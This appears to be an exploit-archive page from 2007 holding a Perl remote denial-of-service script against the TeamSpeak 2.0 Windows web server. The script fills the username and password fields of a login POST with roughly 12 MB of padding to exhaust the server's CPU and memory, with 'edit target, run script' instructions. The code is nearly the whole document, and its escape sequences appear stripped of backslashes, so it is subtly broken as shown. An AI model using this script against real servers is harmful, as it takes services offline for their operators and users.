[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit
# Published : 2007-07-20
# Author : YAG KOHHA
# Previous Title : Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit
# Next Title : Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service
#!/usr/bin/perl
# TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
# Vendor URL: http://www.goteamspeak.com/
# TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
# TODO:
# Edit $target value
# Run script
# CPU 100%, Memory up for 1.2 Gb per one attack session.
# Greetz: str0ke & milw0rm proj
use IO::Socket;
$target = 'xxx.xxx.xxx.xxx';
$port_tcp=14534;
$buffer_ascii= 'A' x 0xc00000;
$buffer_dig= '659090';
$req = "username=$buffer_ascii&password=$buffer_ascii&serverport=$buffer_dig&submit=Login";
$uagent = 'Mozilla 5.0';
my $res;
my $tmp;
print "nStarting D0Snn";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "n Could not connect to hostnn";
print $sock "POST /login.tscmd HTTP/1.1rn";
print $sock "Host: ".$target."rn";
print $sock "User-Agent: ".$uagent."rn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5rn";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3rn";
print $sock "Accept-Encoding: gzip,deflatern";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
print $sock "Connection: closern";
print $sock "Referer: http://".$target."/slogin.htmlrn";
print $sock "Content-Type: application/x-www-form-urlencodedrn";
print $sock "Content-Length: ".length($req)."rnrn";
print $sock $req;
print $sock "n";
while ( $res = <$sock> ) {
$tmp.= $res;
}
print $tmp;
close($sock);
# www.Syue.com [2007-07-20]